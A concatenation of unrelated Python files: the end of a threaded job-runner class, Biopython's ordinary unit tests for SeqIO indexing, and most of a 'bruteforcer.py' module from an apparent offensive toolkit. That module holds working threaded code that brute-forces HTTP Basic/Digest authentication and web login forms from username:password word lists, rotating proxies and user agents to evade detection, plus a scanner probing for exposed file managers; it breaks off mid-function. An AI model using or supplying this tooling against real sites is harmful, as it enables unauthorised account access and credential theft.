self.dp = pfmisc.debug(
verbosity = self.verbosity,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name)
self.dp.qprint('starting crunner...')
threading.Thread.__init__(self)
def jsonJobInfo_queuePut(self, **kwargs):
"""
Get and return the job dictionary as a json string.
"""
str_queue = 'startQueue'
for k,v in kwargs.items():
if k == 'queue': str_queue = v
if str_queue == 'startQueue': queue = self.queueStart
if str_queue == 'endQueue': queue = self.queueEnd
# self.dp.qprint(self.shell.d_job)
queue.put(self.shell.d_job.copy())
def run(self):
timeout = 1
loop = 10
""" Main execution. """
self.dp.qprint("running...")
self.shell(self.str_cmd)
# self.shell.jobs_loopctl( onJobStart = 'self.jsonJobInfo_queuePut(queue="startQueue")',
# onJobDone = 'self.jsonJobInfo_queuePut(queue="endQueue")')
self.shell.jobs_loopctl( onJobStart = partial(self.jsonJobInfo_queuePut, queue="startQueue"),
onJobDone = partial(self.jsonJobInfo_queuePut, queue="endQueue"))
self.queueAllDone.put(True)
self.queueStart.put({'allJobsStarted': True})
self.queueEnd.put({'allJobsDone': True})
# self.shell.exitOnDone()
self.dp.qprint('Crunner.run() returning...')
|
test_SeqIO_index.py | # Copyright 2009-2017 by Peter Cock. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Unit tests for Bio.SeqIO.index(...) and index_db() functions."""
try:
import sqlite3
except ImportError:
# Try to run what tests we can on Jython
# where we don't expect this to be installed.
sqlite3 = None
import os
import unittest
import tempfile
import threading
import gzip
import warnings
from io import BytesIO
from io import StringIO
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
from Bio.SeqIO._index import _FormatToRandomAccess
from Bio import BiopythonParserWarning
from Bio import MissingPythonDependencyError
from seq_tests_common import compare_record
from test_SeqIO import SeqIOTestBaseClass
CUR_DIR = os.getcwd()
if sqlite3:
def raw_filenames(index_filename):
"""Open SQLite index and extract filenames (as is).
Returns a 2-tuple, holding a list of strings, and the value
of the meta_data.filenames_relative_to_index (or None).
"""
con = sqlite3.dbapi2.connect(index_filename)
filenames = [
row[0]
for row in con.execute(
"SELECT name FROM file_data ORDER BY file_number;"
).fetchall()
]
try:
(filenames_relative_to_index,) = con.execute(
"SELECT value FROM meta_data WHERE key=?;",
("filenames_relative_to_index",),
).fetchone()
filenames_relative_to_index = filenames_relative_to_index.upper() == "TRUE"
except TypeError:
filenames_relative_to_index = None
con.close()
return filenames, filenames_relative_to_index
class OldIndexTest(unittest.TestCase):
"""Testing a pre-built index (make sure cross platform etc).
>>> from Bio import SeqIO
>>> d = SeqIO.index_db("triple_sff.idx", ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"], "sff")
>>> len(d)
54
"""
def setUp(self):
os.chdir(CUR_DIR)
def tearDown(self):
os.chdir(CUR_DIR)
def test_old(self):
"""Load existing index with no options (from parent directory)."""
d = SeqIO.index_db("Roche/triple_sff.idx")
self.assertEqual(54, len(d))
self.assertRaises(FileNotFoundError, d.get_raw, "alpha")
def test_old_check_same_thread(self):
"""Setting check_same_thread to False doesn't raise an exception."""
d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
def reader_thread():
try:
d["alpha"]
except sqlite3.ProgrammingError:
self.fail(
"Raised sqlite3.ProgrammingError in violation of check_same_thread=False"
)
reader = threading.Thread(target=reader_thread)
reader.start()
reader.join()
def test_old_rel(self):
"""Load existing index (with relative paths) with no options (from parent directory)."""
d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_contents(self):
"""Check actual filenames in existing indexes."""
filenames, flag = raw_filenames("Roche/triple_sff.idx")
self.assertEqual(flag, None)
self.assertEqual(
filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
)
filenames, flag = raw_filenames("Roche/triple_sff_rel_paths.idx")
self.assertEqual(flag, True)
self.assertEqual(
filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
)
def test_old_same_dir(self):
"""Load existing index with no options (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db("triple_sff.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_same_dir_rel(self):
"""Load existing index (with relative paths) with no options (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db("triple_sff_rel_paths.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_format(self):
"""Load existing index with correct format."""
d = SeqIO.index_db("Roche/triple_sff.idx", format="sff")
self.assertEqual(54, len(d))
def test_old_format_wrong(self):
"""Load existing index with wrong format."""
self.assertRaises(
ValueError, SeqIO.index_db, "Roche/triple_sff.idx", format="fasta"
)
def test_old_files(self):
"""Load existing index with correct files (from parent directory)."""
d = SeqIO.index_db(
"Roche/triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
)
self.assertEqual(54, len(d))
self.assertRaises(FileNotFoundError, d.get_raw, "alpha")
def test_old_files_same_dir(self):
"""Load existing index with correct files (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db(
"triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
)
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_files_wrong(self):
"""Load existing index with wrong files."""
self.assertRaises(
ValueError,
SeqIO.index_db,
"Roche/triple_sff.idx",
["a.sff", "b.sff", "c.sff"],
)
def test_old_files_wrong2(self):
"""Load existing index with wrong number of files."""
self.assertRaises(
ValueError,
SeqIO.index_db,
"Roche/triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff"],
)
class NewIndexTest(unittest.TestCase):
"""Check paths etc in newly built index."""
def setUp(self):
os.chdir(CUR_DIR)
def tearDown(self):
os.chdir(CUR_DIR)
for i in ["temp.idx", "Roche/temp.idx"]:
if os.path.isfile(i):
os.remove(i)
def check(self, index_file, sff_files, expt_sff_files):
if os.path.isfile(index_file):
os.remove(index_file)
# Build index...
d = SeqIO.index_db(index_file, sff_files, "sff")
self.assertEqual(395, len(d["alpha"]))
d._con.close() # hack for PyPy
d.close()
self.assertEqual(
[os.path.abspath(f) for f in sff_files],
[os.path.abspath(f) for f in d._filenames],
)
# Now directly check the filenames inside the SQLite index:
filenames, flag = raw_filenames(index_file)
self.assertEqual(flag, True)
self.assertEqual(filenames, expt_sff_files)
# Load index...
d = SeqIO.index_db(index_file, sff_files)
self.assertEqual(395, len(d["alpha"]))
d._con.close() # hack for PyPy
d.close()
self.assertEqual([os.path.abspath(f) for f in sff_files], d._filenames)
os.remove(index_file)
def test_child_folder_rel(self):
"""Check relative links to child folder."""
# Note we expect relative paths recorded with Unix slashs!
expt_sff_files = [
"Roche/E3MFGYR02_no_manifest.sff",
"Roche/greek.sff",
"Roche/paired.sff",
]
self.check("temp.idx", expt_sff_files, expt_sff_files)
# Here index is given as abs
self.check(
os.path.abspath("temp.idx"),
[
"Roche/E3MFGYR02_no_manifest.sff",
os.path.abspath("Roche/greek.sff"),
"Roche/paired.sff",
],
expt_sff_files,
)
# Here index is given as relative path
self.check(
"temp.idx",
[
"Roche/E3MFGYR02_no_manifest.sff",
os.path.abspath("Roche/greek.sff"),
"Roche/paired.sff",
],
expt_sff_files,
)
def test_same_folder(self):
"""Check relative links in same folder."""
os.chdir("Roche")
expt_sff_files = ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
# Here everything is relative,
self.check("temp.idx", expt_sff_files, expt_sff_files)
self.check(
os.path.abspath("temp.idx"),
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
self.check(
"temp.idx",
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
self.check(
"../Roche/temp.idx",
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
def test_some_abs(self):
"""Check absolute filenames in index.
Unless the repository and tests themselves are under the temp
directory (as detected by ``tempfile``), we expect the index to
use absolute filenames.
"""
h, t = tempfile.mkstemp(prefix="index_test_", suffix=".idx")
os.close(h)
os.remove(t)
abs_sff_files = [
os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
os.path.abspath("Roche/greek.sff"),
os.path.abspath(os.path.join("Roche", "paired.sff")),
]
if os.getcwd().startswith(os.path.dirname(t)):
# The tests are being run from within the temp directory,
# e.g. index filename /tmp/index_test_XYZ.idx
# and working directory of /tmp/biopython/Tests/
# This means the indexing will use a RELATIVE path
# e.g. biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
# not /tmp/biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
expt_sff_files = [
os.path.relpath(f, os.path.dirname(t)) for f in abs_sff_files
]
else:
expt_sff_files = abs_sff_files
# Providing absolute paths...
self.check(t, abs_sff_files, expt_sff_files)
# Now try with mix of abs and relative paths...
self.check(
t,
[
os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
os.path.join("Roche", "greek.sff"),
os.path.abspath("Roche/paired.sff"),
],
expt_sff_files,
)
class IndexDictTests(SeqIOTestBaseClass):
tests = [
("Ace/contig1.ace", "ace"),
("Ace/consed_sample.ace", "ace"),
("Ace/seq.cap.ace", "ace"),
("Quality/wrapping_original_sanger.fastq", "fastq"),
("Quality/example.fastq", "fastq"), # Unix newlines
("Quality/example.fastq", "fastq-sanger"),
("Quality/example_dos.fastq", "fastq"), # DOS/Windows newlines
("Quality/tricky.fastq", "fastq"),
("Quality/sanger_faked.fastq", "fastq-sanger"),
("Quality/solexa_faked.fastq", "fastq-solexa"),
("Quality/illumina_faked.fastq", "fastq-illumina"),
("Quality/zero_length.fastq", "fastq"),
("EMBL/epo_prt_selection.embl", "embl"),
("EMBL/U87107.embl", "embl"),
("EMBL/TRBG361.embl", "embl"),
("EMBL/kipo_prt_sample.embl", "embl"),
("EMBL/A04195.imgt", "embl"), # Not a proper EMBL file, an IMGT file
("EMBL/A04195.imgt", "imgt"),
("EMBL/hla_3260_sample.imgt", "imgt"),
("EMBL/patents.embl", "embl"),
("EMBL/AAA03323.embl", "embl"),
("GenBank/NC_000932.faa", "fasta"),
("GenBank/NC_005816.faa", "fasta"),
("GenBank/NC_005816.tsv", "tab"),
("GenBank/NC_005816.ffn", "fasta"),
("GenBank/NC_005816.fna", "fasta"),
("GenBank/NC_005816.gb", "gb"),
("GenBank/cor6_6.gb", "genbank"),
("GenBank/empty_accession.gbk", "gb"),
("GenBank/empty_version.gbk", "gb"),
("IntelliGenetics/vpu_nucaligned.txt", "ig"),
("IntelliGenetics/TAT_mase_nuc.txt", "ig"),
("IntelliGenetics/VIF_mase-pro.txt", "ig"),
("Phd/phd1", "phd"),
("Phd/phd2", "phd"),
("Phd/phd_solexa", "phd"),
("Phd/phd_454", "phd"),
("NBRF/B_nuc.pir", "pir"),
("NBRF/Cw_prot.pir", "pir"),
("NBRF/clustalw.pir", "pir"),
("SwissProt/sp001", "swiss"),
("SwissProt/sp010", "swiss"),
("SwissProt/sp016", "swiss"),
("SwissProt/multi_ex.txt", "swiss"),
("SwissProt/multi_ex.xml", "uniprot-xml"),
("SwissProt/multi_ex.fasta", "fasta"),
("Roche/E3MFGYR02_random_10_reads.sff", "sff"),
("Roche/E3MFGYR02_random_10_reads.sff", "sff-trim"),
("Roche/E3MFGYR02_index_at_start.sff", "sff"),
("Roche/E3MFGYR02_index_in_middle.sff", "sff"),
("Roche/E3MFGYR02_alt_index_at_start.sff", "sff"),
("Roche/E3MFGYR02_alt_index_in_middle.sff", "sff"),
("Roche/E3MFGYR02_alt_index_at_end.sff", "sff"),
("Roche/E3MFGYR02_no_manifest.sff", "sff"),
("Roche/greek.sff", "sff"),
("Roche/greek.sff", "sff-trim"),
("Roche/paired.sff", "sff"),
("Roche/paired.sff", "sff-trim"),
]
def setUp(self):
os.chdir(CUR_DIR)
h, self.index_tmp = tempfile.mkstemp("_idx.tmp")
os.close(h)
def tearDown(self):
os.chdir(CUR_DIR)
if os.path.isfile(self.index_tmp):
os.remove(self.index_tmp)
def check_dict_methods(self, rec_dict, keys, ids, msg):
self.assertEqual(set(keys), set(rec_dict), msg=msg)
# This is redundant, I just want to make sure len works:
self.assertEqual(len(keys), len(rec_dict), msg=msg)
# Make sure boolean evaluation works
self.assertEqual(bool(keys), bool(rec_dict), msg=msg)
for key, id in zip(keys, ids):
self.assertIn(key, rec_dict, msg=msg)
self.assertEqual(id, rec_dict[key].id, msg=msg)
self.assertEqual(id, rec_dict.get(key).id, msg=msg)
# Check non-existant keys,
assert chr(0) not in keys, "Bad example in test"
with self.assertRaises(KeyError, msg=msg):
rec = rec_dict[chr(0)]
self.assertEqual(rec_dict.get(chr(0)), None, msg=msg)
self.assertEqual(rec_dict.get(chr(0), chr(1)), chr(1), msg=msg)
with self.assertRaises(AttributeError, msg=msg):
rec_dict.iteritems
for key, rec in rec_dict.items():
self.assertIn(key, keys, msg=msg)
self.assertIsInstance(rec, SeqRecord, msg=msg)
self.assertIn(rec.id, ids, msg=msg)
for rec in rec_dict.values():
self.assertIn(key, keys, msg=msg)
self.assertIsInstance(rec, SeqRecord, msg=msg)
self.assertIn(rec.id, ids, msg=msg)
def simple_check(self, filename, fmt, comp):
"""Check indexing (without a key function)."""
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
else:
id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
with warnings.catch_warnings():
if "_alt_index_" in filename:
# BiopythonParserWarning: Could not parse the SFF index:
# Unknown magic number b'.diy' in SFF index header:
# b'.diy1.00'
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
if not sqlite3:
return
# In memory,
# note here give filenames as list of strings
rec_dict = SeqIO.index_db(":memory:", [filename], fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
# check error conditions
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", format="dummy")
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", filenames=["dummy"])
# Saving to file...
index_tmp = self.index_tmp
if os.path.isfile(index_tmp):
os.remove(index_tmp)
# To disk,
# note here we give the filename as a single string
# to confirm that works too.
rec_dict = SeqIO.index_db(index_tmp, filename, fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload it...
rec_dict = SeqIO.index_db(index_tmp, [filename], fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload without passing filenames and format
# and switch directory to check paths still work
index_tmp = os.path.abspath(index_tmp)
os.chdir(os.path.dirname(filename))
try:
rec_dict = SeqIO.index_db(index_tmp)
finally:
os.chdir(CUR_DIR)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
os.remove(index_tmp)
def add_prefix(self, key):
"""Sample key_function for testing index code."""
return "id_" + key
def key_check(self, filename, fmt, comp):
"""Check indexing with a key function."""
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
else:
id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
key_list = [self.add_prefix(id) for id in id_list]
with warnings.catch_warnings():
if "_alt_index_" in filename:
# BiopythonParserWarning: Could not parse the SFF index:
# Unknown magic number b'.diy' in SFF index header:
# b'.diy1.00'
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt, key_function=self.add_prefix)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
if not sqlite3:
return
# In memory,
rec_dict = SeqIO.index_db(
":memory:", [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
# check error conditions
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", format="dummy", key_function=self.add_prefix)
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(
":memory:", filenames=["dummy"], key_function=self.add_prefix
)
rec_dict.close()
# Saving to file...
index_tmp = filename + ".key.idx"
if os.path.isfile(index_tmp):
os.remove(index_tmp)
rec_dict = SeqIO.index_db(
index_tmp, [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload it...
rec_dict = SeqIO.index_db(
index_tmp, [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload without passing filenames and format
rec_dict = SeqIO.index_db(
index_tmp, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
os.remove(index_tmp)
# Done
def get_raw_check(self, filename, fmt, comp):
# Also checking the key_function here
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
with gzip.open(filename, "rb") as handle:
raw_file = handle.read()
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id.lower() for rec in SeqIO.parse(handle, fmt)]
else:
with open(filename, "rb") as handle:
raw_file = handle.read()
id_list = [rec.id.lower() for rec in SeqIO.parse(filename, fmt)]
if fmt in ["sff"]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
if sqlite3:
rec_dict_db = SeqIO.index_db(
":memory:", filename, fmt, key_function=str.lower,
)
else:
rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
if sqlite3:
rec_dict_db = SeqIO.index_db(
":memory:", filename, fmt, key_function=str.lower,
)
self.assertEqual(set(id_list), set(rec_dict), msg=msg)
if sqlite3:
self.assertEqual(set(id_list), set(rec_dict_db), msg=msg)
self.assertEqual(len(id_list), len(rec_dict), msg=msg)
for key in id_list:
self.assertIn(key, rec_dict, msg=msg)
self.assertEqual(key, rec_dict[key].id.lower(), msg=msg)
self.assertEqual(key, rec_dict.get(key).id.lower(), msg=msg)
raw = rec_dict.get_raw(key)
self.assertIsInstance(raw, bytes, msg=msg)
self.assertTrue(raw.strip(), msg=msg)
self.assertIn(raw, raw_file, msg=msg)
if sqlite3:
raw_db = rec_dict_db.get_raw(key)
# Via index using format-specific get_raw which scans the file,
# Via index_db in general using raw length found when indexing.
self.assertEqual(raw, raw_db, msg=msg)
rec1 = rec_dict[key]
# Following isn't very elegant, but it lets me test the
# __getitem__ SFF code is working.
mode = self.get_mode(fmt)
if mode == "b":
handle = BytesIO(raw)
elif mode == "t":
handle = StringIO(raw.decode())
else:
raise RuntimeError("Unexpected mode %s" % mode)
if fmt == "sff":
rec2 = SeqIO.SffIO._sff_read_seq_record(
handle,
rec_dict._proxy._flows_per_read,
rec_dict._proxy._flow_chars,
rec_dict._proxy._key_sequence,
alphabet=None,
trim=False,
)
elif fmt == "sff-trim":
rec2 = SeqIO.SffIO._sff_read_seq_record(
handle,
rec_dict._proxy._flows_per_read,
rec_dict._proxy._flow_chars,
rec_dict._proxy._key_sequence,
alphabet=None,
trim=True,
)
elif fmt == "uniprot-xml":
self.assertTrue(raw.startswith(b"<entry "), msg=msg)
self.assertTrue(raw.endswith(b"</entry>"), msg=msg)
# Currently the __getitem__ method uses this
# trick too, but we hope to fix that later
raw = (
"""<?xml version='1.0' encoding='UTF-8'?>
<uniprot xmlns="http://uniprot.org/uniprot"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://uniprot.org/uniprot
http://www.uniprot.org/support/docs/uniprot.xsd">
%s
</uniprot>
"""
% raw.decode()
)
handle = StringIO(raw)
rec2 = SeqIO.read(handle, fmt)
else:
rec2 = SeqIO.read(handle, fmt)
self.assertEqual(True, compare_record(rec1, rec2))
rec_dict.close()
del rec_dict
if sqlite3:
def test_duplicates_index_db(self):
"""Index file with duplicate identifiers with Bio.SeqIO.index_db()."""
self.assertRaises(
ValueError, SeqIO.index_db, ":memory:", ["Fasta/dups.fasta"], "fasta"
)
def test_duplicates_index(self):
"""Index file with duplicate identifiers with Bio.SeqIO.index()."""
self.assertRaises(ValueError, SeqIO.index, "Fasta/dups.fasta", "fasta")
def test_duplicates_to_dict(self):
"""Index file with duplicate identifiers with Bio.SeqIO.to_dict()."""
with open("Fasta/dups.fasta") as handle:
iterator = SeqIO.parse(handle, "fasta")
self.assertRaises(ValueError, SeqIO.to_dict, iterator)
def test_simple_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.simple_check(filename2, fmt, comp)
def test_key_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.key_check(filename2, fmt, comp)
def test_raw_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.get_raw_check(filename2, fmt, comp)
class IndexOrderingSingleFile(unittest.TestCase):
f = "GenBank/NC_000932.faa"
ids = [r.id for r in SeqIO.parse(f, "fasta")]
def test_order_to_dict(self):
"""Check to_dict preserves order in indexed file."""
d = SeqIO.to_dict(SeqIO.parse(self.f, "fasta"))
self.assertEqual(self.ids, list(d))
def test_order_index(self):
"""Check index preserves order in indexed file."""
d = SeqIO.index(self.f, "fasta")
self.assertEqual(self.ids, list(d))
if sqlite3:
def test_order_index_db(self):
"""Check index_db preserves ordering indexed file."""
d = SeqIO.index_db(":memory:", [self.f], "fasta")
self.assertEqual(self.ids, list(d))
if sqlite3:
class IndexOrderingManyFiles(unittest.TestCase):
def test_order_index_db(self):
"""Check index_db preserves order in multiple indexed files."""
files = ["GenBank/NC_000932.faa", "GenBank/NC_005816.faa"]
ids = []
for f in files:
ids.extend(r.id for r in SeqIO.parse(f, "fasta"))
d = SeqIO.index_db(":memory:", files, "fasta")
self.assertEqual(ids, list(d))
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
bruteforcer.py | import requests,random,smtplib,telnetlib,sys,os,hashlib,base64,subprocess,time,xtelnet,os,threading#,requests_ntlm
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from ftplib import FTP
from .payloads import *
if os.path.isdir('/data/data')==True:
adr=True
if os.path.isdir('/data/data/com.termux/')==True:
termux=True
import mysqlcp
from .pager import *
from .wp import wpadmin
from .hasher import *
from .pager import *
class http_auth_bruteforce:
__slots__=["logs","stop","finish","result"]
def __init__(self,u,word_list=[],threads_daemon=True,logs=True,domain=None,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
self.stop=False
self.logs=logs
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
t.daemon=threads_daemon
t.start()
def done(self):
return self.finish
def crack(self,u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={"User-Agent":us}
if cookie:
hed.update({"Cookie":cookie})
prox=None
if proxy:
prox={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prox=random.choice(proxies)
prox={'http':'http://'+prox,'https':'http://'+prox}
try:
if self.logs==True:
print("[*]Checking Authentication Type:")
resp = requests.get(u,proxies=prox,headers=hed, verify=False, timeout=timeout)
if 'basic' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Basic")
auth_type = requests.auth.HTTPBasicAuth
elif 'digest' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Digest")
auth_type = requests.auth.HTTPDigestAuth
"""elif 'ntlm' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Ntlm")
auth_type = requests_ntlm.HttpNtlmAuth
if not domain:
raise Exception('You need to specify a domain for "Ntlm" authentication !\n\nbane.http_auth_bruteforce("http://example.com",domain="example.com",.....)')"""
else:
if self.logs==True:
print("==>Unknown type")
self.finish=True
return
except:
if self.logs==True:
print("bane doesn't support this type of authentication")
self.finish=True
return
for x in word_list:
try:
if self.stop==True:
self.finish=True
break
username=x.split(":")[0]
"""if domain and auth_type==requests_ntlm.HttpNtlmAuth:
username=domain+'\\'+username"""
password=x.split(":")[1]
if self.logs==True:
print("[*]Trying: {} {}".format(username,password))
prox=None
if proxy:
prox={'http':'http://'+proxy}
if proxies:
prox=random.choice(proxies)
prox={'http':'http://'+prox}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={"User-Agent":us}
if cookie:
hed.update({"Cookie":cookie})
r=requests.get(u, auth=auth_type(username,password),proxies=prox,headers=hed, verify=False, timeout=timeout)
if (r.status_code == 200)and("required" not in r.text.lower())and("wrong" not in r.text.lower())and("invalid" not in r.text.lower())and("denied" not in r.text.lower())and("unauthorized" not in r.text.lower()):
if self.logs==True:
print("[+]Success")
self.result={u:username+":"+password}
self.finish=True
break
else:
if self.logs==True:
print("[-]Fail")
except Exception as ex:
if self.logs==True:
print("[-]Fail")
self.finish=True
def access(u,timeout=10,user_agent=None,cookie=None,bypass=False,proxy=None):
if bypass==True:
u+='#'
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
try:
r=requests.get(u, headers = {'User-Agent': random.choice(ua)} , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if (("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text)):
return True
except Exception as e:
pass
return False
class web_login_bruteforce:
__slots__=["stop","finish","result","logs"]
def try_combo(self,url,username,password,cookie,user_agent,proxy,timeout):
prox=None
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
cookies=None
h={"User-Agent":user_agent}
if cookie:
h.update({"Cookie":cookie})
cookies=cookie
try:
r=requests.get(url,proxies=proxy,headers=h, verify=False, timeout=timeout)
except:
return False
cook=None
try:
cook=r.headers['Set-cookie']
except:
pass
cookies=set_correct_cookies(cook,cookie=cookie)
form=set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
h={"User-Agent":user_agent}
if cookies:
h.update({"Cookie":cookies})
d=form[0]
h.update({"Referer":form[1],"Origin":form[1].split("://")[0]+"://"+form[1].split("://")[1].split("/")[0]})
try:
r=requests.post(form[1],data=d,headers=h,verify=False,proxies=proxy, timeout=timeout)
except:
return False
try:
set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
return False
except:
return True
def __init__(self,u,word_list=[],threads_daemon=True,logs=True,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
self.stop=False
self.finish=False
self.logs=logs
self.result={}
t=threading.Thread(target=self.crack,args=(u,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
t.daemon=threads_daemon
t.start()
def done(self):
return self.finish
def crack(self,u,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
for x in word_list:
try:
if self.stop==True:
self.finish=True
break
username=x.split(":")[0]
password=x.split(":")[1]
if self.logs==True:
print("[*]Trying: {} {}".format(username,password))
if user_agent:
us=user_agent
else:
us=random.choice(ua)
prox=None
if proxy:
prox=proxy
if proxies:
prox=random.choice(proxies)
if self.try_combo(u,username,password,cookie,us,prox,timeout)==True:
if self.logs==True:
print("[+]Success")
self.result={u:username+":"+password}
self.finish=True
break
else:
if self.logs==True:
print("[-]Fail")
except Exception as e:
pass
if self.logs==True:
print("[-]Fail")
self.finish=True
class filemanager_finder:
__slots__=["logs","stop","finish","result"]
def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,timeout=10,proxy=None,proxies=None):
'''
u: the link: http://www.example.com
logs: (set by default to True) the show the process and requests
mapping: (set by default to: False) if it is set to True, it will stop the prcess when it finds the link, else: it continue for more
possible links
returning: (set by default to: False) if you want it to return a list of possibly accesseble links to be used in your scripts set it to: True
timeout: (set by default to 10) timeout flag for the requests
usage:
>>>import bane
>>>url='http://www.example.com/'
>>>bane.filemanager_finder(url)
'''
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,logs,user_agent,cookie,timeout,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,logs,user_agent,cookie,timeout,proxy,proxies):
for i in manager:
if self.stop==True:
self.finish=True
break
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prx=random.choice(proxies)
proxy={'http':'http://'+prx,'https':'http://'+prx}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
r=requests.get(g, headers = hed , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
